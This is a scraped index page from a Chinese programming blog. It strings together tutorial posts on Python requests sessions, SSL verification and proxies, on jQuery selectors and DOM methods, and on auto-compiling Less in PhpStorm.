cookies = dict(cookies_are='working')
r = requests.get(url, cookies=cookies)
print r.text

运行结果

1	'{"cookies": {"cookies_are": "working"}}'

可以已经成功向服务器发送了 cookies

超时配置

可以利用 timeout 变量来配置最大请求时间

1	requests.get('http://github.com', timeout=0.001)

注：timeout 仅对连接过程有效，与响应体的下载无关。 也就是说，这个时间只限制请求的时间。即使返回的 response 包含很大内容，下载需要一定时间，然而这并没有什么卵用。

会话对象

在以上的请求中，每次请求其实都相当于发起了一个新的请求。也就是相当于我们每个请求都用了不同的浏览器单独打开的效果。也就是它并不是指的一个会话，即使请求的是同一个网址。比如

import requests

requests.get('http://httpbin.org/cookies/set/sessioncookie/123456789')
r = requests.get("http://httpbin.org/cookies")
print(r.text)

结果是

1
2
3

{
  "cookies": {}
}

很明显，这不在一个会话中，无法获取 cookies，那么在一些站点中，我们需要保持一个持久的会话怎么办呢？就像用一个浏览器逛淘宝一样，在不同的选项卡之间跳转，这样其实就是建立了一个长久会话。解决方案如下

import requests

s = requests.Session()
s.get('http://httpbin.org/cookies/set/sessioncookie/123456789')
r = s.get("http://httpbin.org/cookies")
print(r.text)

在这里我们请求了两次，一次是设置 cookies，一次是获得 cookies 运行结果

{
  "cookies": {
    "sessioncookie": "123456789"
  }
}

发现可以成功获取到 cookies 了，这就是建立一个会话到作用。体会一下。那么既然会话是一个全局的变量，那么我们肯定可以用来全局的配置了。

import requests

s = requests.Session()
s.headers.update({'x-test': 'true'})
r = s.get('http://httpbin.org/headers', headers={'x-test2': 'true'})
print r.text

通过 s.headers.update 方法设置了 headers 的变量。然后我们又在请求中设置了一个 headers，那么会出现什么结果？很简单，两个变量都传送过去了。运行结果

{
  "headers": {
    "Accept": "*/*", 
    "Accept-Encoding": "gzip, deflate", 
    "Host": "httpbin.org", 
    "User-Agent": "python-requests/2.9.1", 
    "X-Test": "true", 
    "X-Test2": "true"
  }
}

如果get方法传的headers 同样也是 x-test 呢？

1	r = s.get('http://httpbin.org/headers', headers={'x-test': 'true'})

嗯，它会覆盖掉全局的配置

{
  "headers": {
    "Accept": "*/*", 
    "Accept-Encoding": "gzip, deflate", 
    "Host": "httpbin.org", 
    "User-Agent": "python-requests/2.9.1", 
    "X-Test": "true"
  }
}

那如果不想要全局配置中的一个变量了呢？很简单，设置为 None 即可

1	r = s.get('http://httpbin.org/headers', headers={'x-test': None})

运行结果

{
  "headers": {
    "Accept": "*/*", 
    "Accept-Encoding": "gzip, deflate", 
    "Host": "httpbin.org", 
    "User-Agent": "python-requests/2.9.1"
  }
}

嗯，以上就是 session 会话的基本用法

SSL证书验证

现在随处可见 https 开头的网站，Requests可以为HTTPS请求验证SSL证书，就像web浏览器一样。要想检查某个主机的SSL证书，你可以使用 verify 参数现在 12306 证书不是无效的嘛，来测试一下

import requests

r = requests.get('https://kyfw.12306.cn/otn/', verify=True)
print r.text

结果

1	requests.exceptions.SSLError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:590)

果真如此来试下 github 的

import requests

r = requests.get('https://github.com', verify=True)
print r.text

嗯，正常请求，内容我就不输出了。如果我们想跳过刚才 12306 的证书验证，把 verify 设置为 False 即可

import requests

r = requests.get('https://kyfw.12306.cn/otn/', verify=False)
print r.text

发现就可以正常请求了。在默认情况下 verify 是 True，所以如果需要的话，需要手动设置下这个变量。

代理

如果需要使用代理，你可以通过为任意请求方法提供 proxies 参数来配置单个请求

import requests

proxies = {
  "https": "http://41.118.132.69:4433"
}
r = requests.post("http://httpbin.org/post", proxies=proxies)
print r.text

也可以通过环境变量 HTTP_PROXY 和 HTTPS_PROXY 来配置代理

1 2	export HTTP_PROXY="http://10.10.1.10:3128" export HTTPS_PROXY="http://10.10.1.10:1080"

通过以上方式，可以方便地设置代理。

API

以上讲解了 requests 中最常用的参数，如果需要用到更多，请参考官方文档 API API

结语

以上总结了一下 requests 的基本用法，如果你对爬虫有了一定的基础，那么肯定可以很快上手，在此就不多赘述了。练习才是王道，大家尽快投注于实践中吧。

作者崔庆才发表于 2016-03-19 阅读次数：本文字数： 7.6k 阅读时长 ≈ 7 分钟

JavaScript jQuery易忽略的知识点总结

前言

之前在用jQuery，不过有时候用着用着一些用法发现并没有用到过，比较陌生，现在重新梳理一下，把易忽略的知识点总结一下，长期更新。参考梳理来源：慕课网

sele1,sele2,seleN选择器

有时需要精确的选择任意多个指定的元素，类似于从文具盒中挑选出多根自已喜欢的笔，就需要调用sele1,sele2,seleN选择器，它的调用格式如下： $(“sele1,sele2,seleN”) 其中参数sele1、sele2到seleN为有效选择器，每个选择器之间用“，”号隔开，它们可以是之前提及的各种类型选择器，如$(“#id”)、$(“.class”)、$(“selector”)选择器等。例如，通过选择器获取其中的任意两个元素，并将它们显示的内容设为相同，如图所示：在浏览器中显示的效果：虽然页面中添加了三个元素，但是通过使用$(“div,p”)选择器方式获取了其中的

和

元素，并设置它们显示的内容。

prev + next选择器

俗话说“远亲不如近邻”，而通过prev + next选择器就可以查找与“prev”元素紧邻的下一个“next”元素，格式如下： $(“prev + next”) 其中参数prev为任何有效的选择器，参数“next”为另外一个有效选择器，它们之间的“+”表示一种上下的层次关系，也就是说，“prev”元素最紧邻的下一个元素由“next”选择器返回的并且只返回唯的一个元素。例如，使用prev + next选择器，获取

元素最近邻的下一个元素，如下图所示：在浏览器中显示的效果：

prev ~ siblings选择器

与上一节中介绍的prev + next层次选择器相同，prev ~ siblings选择器也是查找prev 元素之后的相邻元素，但前者只获取第一个相邻的元素，而后者则获取prev 元素后面全部相邻的元素，它的调用格式如下： $(“prev ~ siblings”) 其中参数prev与siblings两者之间通过“~”符号形成一种层次相邻的关系，表明siblings选择器获取的元素都是prev元素之后的同辈元素。例如，使用prev ~ next选择器，获取

元素后面相邻的全部元素，并设置它们在页面中显示的内容，如下图所示：在浏览器中显示的效果：可以看出，调用$("p~span")选择器代码，获取了

元素下面两个(全部)的元素，该元素不包含

元素上面的元素和不属于同辈范围的元素。

:contains(text)过滤选择器

与上一节介绍的:eq(index)选择器按索引查找元素相比，有时候我们可能希望按照文本内容来查找一个或多个元素，那么使用:contains(text)选择器会更加方便，它的功能是选择包含指定字符串的全部元素，它通常与其他元素结合使用，获取包含“text”字符串内容的全部元素对象。其中参数text表示页面中的文字。例如: 在浏览器中显示的效果：从图中可以看出，调用li:contains('土豪')代码，可以很方便地获取

中包含‘土豪’字符内容的全部元素，并且只要与选择的元素中或子元素中包含该字符内容，就可以被选中。注意：li:contains('土豪') 土豪为什么必须加单引号呢？因为它是一个字符串，而不是一个变量，所以不加单或双引号的话是会报错的。

:has(selector)过滤选择器

除了在上一小节介绍的使用包含的字符串内容过滤元素之外，还可以使用包含的元素名称来过滤，:has(selector)过滤选择器的功能是获取选择器中包含指定元素名称的全部元素，其中selector参数就是包含的元素名称，是被包含元素。例如：获取指定包含某个元素名的全部

元素，并改变它们显示文字的颜色，如下图所示：

在浏览器中显示的效果：

可以看出，通过使用$("li:has('p')")选择器代码，获取了包含

元素的全部

元素，并通过css方法改变了这些元素在页面中显示的文字样式。

:hidden过滤选择器

:hidden过滤选择器的功能是获取全部不可见的元素，这些不可见的元素中包括type属性值为hidden的元素。例如，调用:hidden选择器获取不可见的

元素，并将该元素的内容显示在

元素中，如下图所示：

在浏览器中显示的效果：

从图中可以看出，先调用$("p:hidden")代码获取隐藏的

元素，并调用该元素的html()方法获取该元素中的内容，最后将该内容显示在

元素中。

:visible过滤选择器

与上一节的:hidden过滤选择器相反，:visible过滤选择器获取的是全部可见的元素，也就是说，只要不将元素的display属性值设置为“none”，那么，都可以通过该选择器获取。例如，使用:visible选择器获取可见的

元素，并将该元素的内容显示在

元素中，如下图所示：

在浏览器中显示的效果：

从图中可以看出，调用$("p:visible")选择器代码，获取那个可见的

元素，并调用html()方法获取该元素的内容，最后将该内容显示在

元素中。

:input表单选择器

如何获取表单全部元素？:input表单选择器可以实现，它的功能是返回全部的表单元素，不仅包括所有标记的表单元素，而且还包括、<select> 和 <button>标记的表单元素，因此，它选择的表单元素是最广的。如下图所示，使用<code>:input</code>表单选择器获取表单元素，并向这些元素增加一个CSS样式类别，修改它们在页面中显示的边框颜色。 <img src="http://img.mukewang.com/52970dc4000102ab03820242.jpg" alt=""> 在浏览器中显示的效果： <img src="http://img.mukewang.com/52970dd300016ac304760305.jpg" alt=""> 可以看出，通过调用$(“#frmTest :input”)表单选择器代码获取了表单中的全部元素，并使用addClass()方法修改它们在页面中显示的边框颜色。addClass()方法的功能是为元素添加指定的样式类别名称，它的更多使用将会在后续章节中进行详细介绍。 <h2 id="text表单文本选择器"><a href="#text表单文本选择器" class="headerlink" title=":text表单文本选择器"></a>:text表单文本选择器</h2><code>:text</code>表单文本选择器可以获取表单中全部单行的文本输入框元素，单行的文本输入框就像一个不换行的字条工具，使用非常广泛。例如，在表单中添加多个元素，使用<code>:text</code>选择器获取单行的文本输入框元素，并修改字的边框颜色，如下图所示： <img src="http://img.mukewang.com/5297107600011ddf04240201.jpg" alt=""> 在浏览器中显示的效果： <img src="http://img.mukewang.com/52971086000125ea04440275.jpg" alt=""> 从图中可以看出，通过<code>:text</code>表单选择器只获取单行的文本输入框元素，对于<textarea>区域文本、按钮元素无效。 <h2 id="password表单密码选择器"><a href="#password表单密码选择器" class="headerlink" title=":password表单密码选择器"></a>:password表单密码选择器</h2>如果想要获取密码输入文本框，可以使用<code>:password</code>选择器，它的功能是获取表单中全部的密码输入文本框元素。例如，在表单中添加多个输入框元素，使用<code>:password</code>获取密码输入文本框元素，并修改它的边框颜色，如下图所示： <img src="http://img.mukewang.com/529713cd000159b804810217.jpg" alt=""> 在浏览器中显示的效果： <img src="http://img.mukewang.com/529713e50001b30004510309.jpg" alt=""> 从图中可以看出，在多个文本输入框中，使用:password选择器只能获取表单中的密码输入文本框，并使用addClass()方法改变它的边框颜色。 <h2 id="radio单选按钮选择器"><a href="#radio单选按钮选择器" class="headerlink" title=":radio单选按钮选择器"></a>:radio单选按钮选择器</h2>表单中的单选按钮常用于多项数据中仅选择其一，而使用<code>:radio</code>选择器可轻松获取表单中的全部单选按钮元素。例如，在表单中添加多种类型的表单元素，使用<code>:radio</code>选择器获取并隐藏这些元素中的全部单选按钮元素，如下图所示： <img src="http://img.mukewang.com/529715580001099503830280.jpg" alt=""> <code>hide()</code>方法的功能是隐藏指定的元素。在浏览器中显示的效果： <img src="http://img.mukewang.com/529715c60001ca0504500321.jpg" alt=""> 以上是:radio选择器的效果。 <h2 id="checkbox复选框选择器"><a href="#checkbox复选框选择器" class="headerlink" title=":checkbox复选框选择器"></a>:checkbox复选框选择器</h2>表单中的复选框常用于多项数据的选择，使用<code>:checkbox</code>选择器可以快速定位并获取表单中的复选框元素。例如，在表单中增加多个不同类型的元素，使用<code>:checkbox</code>选择器获取其中的全部复选框元素，并将它们全部设为选中状态，如下图所示： <a href="http://img.mukewang.com/52971ac700017fbf03830322.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52971ac700017fbf03830322.jpg" alt=""></a> 在浏览器中显示的效果： <a href="http://img.mukewang.com/52971afe0001750304500280.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52971afe0001750304500280.jpg" alt=""></a> 这样便实现了选中 checkbox 的效果，做全选的时候比较方便。 <h2 id="submit提交按钮选择器"><a href="#submit提交按钮选择器" class="headerlink" title=":submit提交按钮选择器"></a>:submit提交按钮选择器</h2>通常情况下，一个表单中只允许有一个“type”属性值为“submit”的提交按钮，使用<code>:submit</code>选择器可获取表单中的这个提交按钮元素。例如，在表单中添加多个不同类型的按钮，使用<code>:submit</code>选择器获取其中的提交按钮，并使用<code>attr()</code>方法修改按钮显示的文本内容，如下图所示： <a href="http://img.mukewang.com/52b2584e000129a804330199.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52b2584e000129a804330199.jpg" alt=""></a> 在浏览器中显示的效果： <a href="http://img.mukewang.com/52b258c60001e23604500280.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52b258c60001e23604500280.jpg" alt=""></a> 从图中可以看出，使用<code>:submit</code>选择器从三种类型按钮中获取了提交按钮，并使用<code>attr()</code>方法将该按钮显示的文字修改为“点我就提交了”。 <h2 id="button表单按钮选择器"><a href="#button表单按钮选择器" class="headerlink" title=":button表单按钮选择器"></a>:button表单按钮选择器</h2>表单中包含许多类型的按钮，而使用<code>:button</code>选择器能获取且只能获取“type”属性值为“button”的<input>和<button>这两类普通按钮元素。例如，在表单中添加多种类型的按钮元素，使用<code>:button</code>选择器获取其中的普通按钮元素，并修改它们的边框色，如下图所示： <a href="http://img.mukewang.com/52b286a50001862e04740207.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52b286a50001862e04740207.jpg" alt=""></a> 在浏览器中显示的效果： <a href="http://img.mukewang.com/52b286e100017beb04530252.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52b286e100017beb04530252.jpg" alt=""></a> 从图中可以看出，使用<code>:button</code>选择器只能获取两种类型的普通按钮，且修改了它们的边框颜色，并未获取表单中的“提交按钮”。 <h2 id="checked选中状态选择器"><a href="#checked选中状态选择器" class="headerlink" title=":checked选中状态选择器"></a>:checked选中状态选择器</h2>有一些元素存在选中状态，如复选框、单选按钮元素，选中时“checked”属性值为“checked”，调用:checked可以获取处于选中状态的全部元素。例如，在表单中添加多个复选框和单选按钮，其中有一些元素处于选中状态，使用<code>:checked</code>获取并隐藏处于选中状态的元素，如下图所示： <a href="http://img.mukewang.com/52b28b1500017db404530386.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52b28b1500017db404530386.jpg" alt=""></a> 在浏览器中显示的效果： <a href="http://img.mukewang.com/52b28b3b00015c7f04500290.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52b28b3b00015c7f04500290.jpg" alt=""></a> 从图中可以看出，使用<code>:checked</code>选择器可以获取处于选中状态的元素，并调用<code>hide()</code>方法将它们进行隐藏。 <h2 id="selected选中状态选择器"><a href="#selected选中状态选择器" class="headerlink" title=":selected选中状态选择器"></a>:selected选中状态选择器</h2>与<code>:checked</code>选择器相比，<code>:selected</code>选择器只能获取<select>下拉列表框中全部处于选中状态的<option>选项元素。例如，在一个添加多个<option>选项的下拉列表框中，使用<code>:selected</code>选择器修改处于选中状态的内容值，如下图所示： <a href="http://img.mukewang.com/52b28d15000198f404430262.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52b28d15000198f404430262.jpg" alt=""></a> 在浏览器中显示的效果： <a href="http://img.mukewang.com/52b28d370001a09004570304.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52b28d370001a09004570304.jpg" alt=""></a> 从图中可以看出，使用<code>:selected</code>选择器获取处于选中状态的<option>元素，并调用<code>text()</code>方法修改这些选中状态元素显示的内容。<code>text()</code>方法的功能是获取或设置元素的文本内容，该方法在后续将有详细的介绍。 <h2 id="first-child子元素过滤选择器"><a href="#first-child子元素过滤选择器" class="headerlink" title=":first-child子元素过滤选择器"></a>:first-child子元素过滤选择器</h2>通过上面章节的学习，我们知道使用<code>:first</code>过滤选择器可以获取指定父元素中的首个子元素，但该选择器返回的只有一个元素，并不是一个集合，而使用<code>:first-child</code>子元素过滤选择器则可以获取每个父元素中返回的首个子元素，它是一个集合，常用多个集合数据的选择处理。如下图，如果想把页面中每个ul中的第一个li获取到，并改变其颜色。则可以使用 <code>: first-child</code> <a href="http://img.mukewang.com/529c2a9000014a0e03500322.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/529c2a9000014a0e03500322.jpg" alt=""></a> 在浏览器中显示的效果： <a href="http://img.mukewang.com/529c2ab600011b5804890326.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/529c2ab600011b5804890326.jpg" alt=""></a> 通过<code>$("li:first-child")</code>选择器代码，获取了两个<ul>父元素中的第一个<li>元素，并使用<code>css()</code>方法修改了它们在页面中显示的文字颜色。 <h2 id="替换内容"><a href="#替换内容" class="headerlink" title="替换内容"></a>替换内容</h2><code>replaceWith()</code>和<code>replaceAll()</code>方法都可以用于替换元素或元素中的内容，但它们调用时，内容和被替换元素所在的位置不同，分别为如下所示： <code>**$(selector).replaceWith(content)**</code>和<code>**$(content).replaceAll(selector)**</code> 参数selector为被替换的元素，content为替换的内容。例如，调用<code>replaceWith()</code>方法将页面中元素替换成一段HTML字符串，如下图所示： <a href="http://img.mukewang.com/52bcdc2c0001b69c04750130.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52bcdc2c0001b69c04750130.jpg" alt=""></a> 在浏览器中显示的效果： <a href="http://img.mukewang.com/52bcdc4f0001e25f04830237.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52bcdc4f0001e25f04830237.jpg" alt=""></a> 从图中可以看出，使用<code>replaceWith()</code>方法替换类别名为“green”的元素，替换之后，旧元素完全由新替换的元素所取代。 <h2 id="使用wrap-和wrapInner-方法包裹元素和内容"><a href="#使用wrap-和wrapInner-方法包裹元素和内容" class="headerlink" title="使用wrap()和wrapInner()方法包裹元素和内容"></a>使用wrap()和wrapInner()方法包裹元素和内容</h2><code>wrap()</code>和<code>wrapInner()</code>方法都可以进行元素的包裹，但前者用于包裹元素本身，后者则用于包裹元素中的内容，它们的调用格式分别为： <code>**$(selector).wrap(wrapper)**</code>和<code>**$(selector).wrapInner(wrapper)**</code> 参数selector为被包裹的元素，wrapper参数为包裹元素的格式。例如，调用<code>wrap()</code>方法，将用<div>元素包裹起来，如下图所示： <a href="http://img.mukewang.com/52bcdea700016dbf03980120.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52bcdea700016dbf03980120.jpg" alt=""></a> 在浏览器中显示的效果： <a href="http://img.mukewang.com/52bcdf080001301504830245.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52bcdf080001301504830245.jpg" alt=""></a> 从图中可以看出，红色区域的元素被蓝色边框的<div>元素通过<code>wrap()</code>方法包裹起来 <h2 id="使用remove-和empty-方法删除元素"><a href="#使用remove-和empty-方法删除元素" class="headerlink" title="使用remove()和empty()方法删除元素"></a>使用remove()和empty()方法删除元素</h2><code>remove()</code>方法删除所选元素本身和子元素，该方法可以通过添加过滤参数指定需要删除的某些元素，而<code>empty()</code>方法则只删除所选元素的子元素。例如，调用<code>remove()</code>方法删除元素中类别名为“red”的，如下图所示： <a href="http://img.mukewang.com/52bceff500018e0702910171.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52bceff500018e0702910171.jpg" alt=""></a> 在浏览器中显示的效果： <a href="http://img.mukewang.com/52bcf01c00013b5004830297.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52bcf01c00013b5004830297.jpg" alt=""></a> 从图中可以看出，使用<code>remove(".red")</code>方法只是把元素中类别名为“red”的这部分元素给删除了。 <h2 id="使用hover-方法切换事件"><a href="#使用hover-方法切换事件" class="headerlink" title="使用hover()方法切换事件"></a>使用hover()方法切换事件</h2><code>hover()</code>方法的功能是当鼠标移到所选元素上时，执行方法中的第一个函数，鼠标移出时，执行方法中的第二个函数，实现事件的切实效果，调用格式如下： <code>**$(selector).hover(over****，****out);**</code> over参数为移到所选元素上触发的函数，out参数为移出元素时触发的函数。例如，当鼠标移到<div>元素上时，元素中的字体变成金黄色，如下图所示： <a href="http://img.mukewang.com/52d22c9900013dbd03190241.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52d22c9900013dbd03190241.jpg" alt=""></a> 在浏览器中显示的效果： <a href="http://img.mukewang.com/52d22cba0001163f04670262.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52d22cba0001163f04670262.jpg" alt=""></a> 从图中可以看出，使用<code>hover()</code>方法执行两个函数，当鼠标移在元素上时调用<code>addClass()</code>方法增加一个样式，移出时，调用<code>removeClass()</code>方法移除该样式。 <h2 id="使用toggle-方法绑定多个函数"><a href="#使用toggle-方法绑定多个函数" class="headerlink" title="使用toggle()方法绑定多个函数"></a>使用toggle()方法绑定多个函数</h2><code>toggle()</code>方法可以在元素的click事件中绑定两个或两个以上的函数，同时，它还可以实现元素的隐藏与显示的切换，绑定多个函数的调用格式如下： <code>**$(selector).toggle(fun1(),fun2(),funN(),...)**</code> 其中，fun1，fun2就是多个函数的名称例如，使用<code>toggle()</code>方法，当每次点击<div>元素时，显示不同内容，如下图所示： <a href="http://img.mukewang.com/52d22e3a0001c56d02980289.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52d22e3a0001c56d02980289.jpg" alt=""></a> 在浏览器中显示的效果： <a href="http://img.mukewang.com/52d22e570001902a04670335.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52d22e570001902a04670335.jpg" alt=""></a> 从图中可以看出，每次点击<div>元素时，都依次执行<code>toggle()</code>方法绑定的函数，当执行到最后一个函数时，再次点击将又返回执行第一个函数。注意：toggle()方法支持目前主流稳定的jQuery版本1.8.2，在1.9.0之后的版本是不支持的。 <h2 id="使用one-方法绑定元素的一次性事件"><a href="#使用one-方法绑定元素的一次性事件" class="headerlink" title="使用one()方法绑定元素的一次性事件"></a>使用one()方法绑定元素的一次性事件</h2><code>one()</code>方法可以绑定元素任何有效的事件，但这种方法绑定的事件只会触发一次，它的调用格式如下： <code>**$(selector).one(event,[data],fun)**</code> 参数event为事件名称，data为触发事件时携带的数据，fun为触发该事件时执行的函数。例如，使用one方法绑定<div>元素的单击事件，在事件执行的函数中，累计执行的次数，并将该次数显示在页面中，如下图所示： <a href="http://img.mukewang.com/52d231bd000192fb04310219.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52d231bd000192fb04310219.jpg" alt=""></a> 在浏览器中显示的效果： <a href="http://img.mukewang.com/52d231dd00011da004890293.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52d231dd00011da004890293.jpg" alt=""></a> 从图中可以看出，由于使用了<code>one()</code>方法绑定<div>元素的单击事件，因为事件函数只能执行一次，执行完成后，无论如何单击，都不再触发。 <h2 id="调用animate-方法制作移动位置的动画"><a href="#调用animate-方法制作移动位置的动画" class="headerlink" title="调用animate()方法制作移动位置的动画"></a>调用animate()方法制作移动位置的动画</h2>调用<code>animate()</code>方法不仅可以制作简单渐渐变大的动画效果，而且还能制作移动位置的动画，在移动位置之前，必须将被移元素的“position”属性值设为“absolute”或“relative”，否则，该元素移动不了。例如，调用<code>animate()</code>方法先将图片向右移动90px，然后，再将图片宽度与高度分别增加30px，如下图所示： <a href="http://img.mukewang.com/52dcc4eb0001c08e03410291.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52dcc4eb0001c08e03410291.jpg" alt=""></a> 在浏览器中显示的效果： <a href="http://img.mukewang.com/52dcc50b0001ba2205060337.jpg" target="_blank" rel="noopener"><img src="http://img.mukewang.com/52dcc50b0001ba2205060337.jpg" alt=""></a> 从图中可以看出，图片先向右移动了“90px”，然后，移动成功后，再在原来的基础之上以动画的效果增大30px，增加成功后，显示“执行完成！”的字样。 s </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2016-03-16 14:12:32" itemprop="dateCreated datePublished" datetime="2016-03-16T14:12:32+08:00">2016-03-16</time> 阅读次数： 本文字数： 6.2k 阅读时长 ≈ 6 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2491.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> Other </a> <a href="/2491.html" class="post-title-link" itemprop="url">PhpStorm使用File Watchers自动编译less</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> <h2 id="综述"><a href="#综述" class="headerlink" title="综述"></a>综述</h2> PhpStorm 可以使用 File Watchers 自动编译 Less，有了这个 IDE，妈妈再也不用担心我的 Less 编译了。下面说一下我的配置过程。下面的例子以 Mac OS X 为例。 <h2 id="配置"><a href="#配置" class="headerlink" title="配置"></a>配置</h2> <h3 id="1-配置-npm"><a href="#1-配置-npm" class="headerlink" title="1.配置 npm"></a>1.配置 npm</h3> <figure class="highlight mipsasm"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>brew install npm </pre> </td> </tr> </table> </figure> 更多平台安装方式 <a href="https://www.npmjs.com/" target="_blank" rel="noopener">npm</a> <h3 id="2-安装-lessc"><a href="#2-安装-lessc" class="headerlink" title="2.安装 lessc"></a>2.安装 lessc</h3> <figure class="highlight cmake"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>npm install less -g </pre> </td> </tr> </table> </figure> 安装完毕后查看安装路径 <figure class="highlight bash"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>which lessc </pre> </td> </tr> </table> </figure> Mac OS X 的结果是 <figure class="highlight awk"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>/usr/local/bin/lessc </pre> </td> </tr> </table> </figure> <h3 id="3-配置-PhpStorm"><a href="#3-配置-PhpStorm" class="headerlink" title="3.配置 PhpStorm"></a>3.配置 PhpStorm</h3> 打开 PhpStorm，Preferences->Tools->File Watchers 点击加号新增 Less Template，然后点击编辑按钮编辑，页面如下 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2016/02/56926F1E-D626-4E66-925D-15971F993F30.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2016/02/56926F1E-D626-4E66-925D-15971F993F30-1024x557.jpg" alt="56926F1E-D626-4E66-925D-15971F993F30"></a> 其中需要配置两个地方 <h4 id="Program："><a href="#Program：" class="headerlink" title="Program："></a>Program：</h4> 配置为 lessc 的路径，这边配置为 /usr/local/bin/lessc <h4 id="Output-paths-to-refresh："><a href="#Output-paths-to-refresh：" class="headerlink" title="Output paths to refresh："></a>Output paths to refresh：</h4> <figure class="highlight groovy"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>$FileParentDir(less)$/css/$FileDirPathFromParent(less)$/$FileNameWithoutExtension$.css </pre> </td> </tr> </table> </figure> 在这里简单解释下这个路径的意思。 <blockquote> 例如项目名为 project，less 文件我们放置在 project/public/less/manage/style.less $FileParentDir(less)$ 是获取 less 目录的路径，也就是 project/public $FileDirPathFromParent(less)$ 是获取 less 文件到 less 目录的路径，也就是 manage $FileNameWithoutExtension$ 是获取 less 文件不带后缀的名字，也就是 style 经过如上拼接，生成的内容为 project/public/css/manage/style.css </blockquote> 所以，不论我们的 less 文件如何放置，都可以生成相对路径的 css 文件。配置完成之后，我们新建 less 目录，任意编辑一个 less 文件，都会在 css 目录下生成相应的文件。 <h2 id="简单配置"><a href="#简单配置" class="headerlink" title="简单配置"></a>简单配置</h2> 当然，如果你的 less 文件就直接在 less 目录下，可以简单配置以上的 Output Path 如下 ../css/$FileNameWithoutExtension$.css 这也是一种比较常用的配置方法。如果目录结构简单，可以采取以上方式。 </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2016-02-25 14:16:39" itemprop="dateCreated datePublished" datetime="2016-02-25T14:16:39+08:00">2016-02-25</time> 阅读次数： 本文字数： 949 阅读时长 ≈ 1 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2469.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> JavaScript </a> <a href="/2469.html" class="post-title-link" itemprop="url">JavaScript与jQuery基本用法总结</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> <h2 id="JavaScript"><a href="#JavaScript" class="headerlink" title="JavaScript"></a>JavaScript</h2> <ol> <li><a href="http://cuiqingcai.com/1253.html">JavaScript高级用法一之事件响应与网页交互</a> 2. <a href="http://cuiqingcai.com/1257.html">JavaScript高级用法二之内置对象</a> 3. <a href="http://cuiqingcai.com/1263.html">JavaScript高级用法三之浏览器对象</a> 4. <a href="http://cuiqingcai.com/1278.html">JavaScript高级用法四之DOM对象</a> 5. <a href="http://cuiqingcai.com/1444.html">JavaScript高级用法五之常用对象</a></li> </ol> <h2 id="jQuery"><a href="#jQuery" class="headerlink" title="jQuery"></a>jQuery</h2> <ol> <li><a href="http://cuiqingcai.com/1544.html">jQuery应用一之验证插件validate的使用</a> 2. <a href="http://cuiqingcai.com/1573.html">jQuery应用二之邮箱下拉列表自动补全</a> 3. <a href="http://cuiqingcai.com/1585.html">jQuery应用三之图片浏览插件LightBox</a> 4. <a href="http://cuiqingcai.com/1592.html">jQuery应用四之图片局部放大插件jQZoom</a> 5. <a href="http://cuiqingcai.com/1680.html">jQuery应用五之瀑布流效果的实现</a></li> </ol> </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2016-02-11 21:50:19" itemprop="dateCreated datePublished" 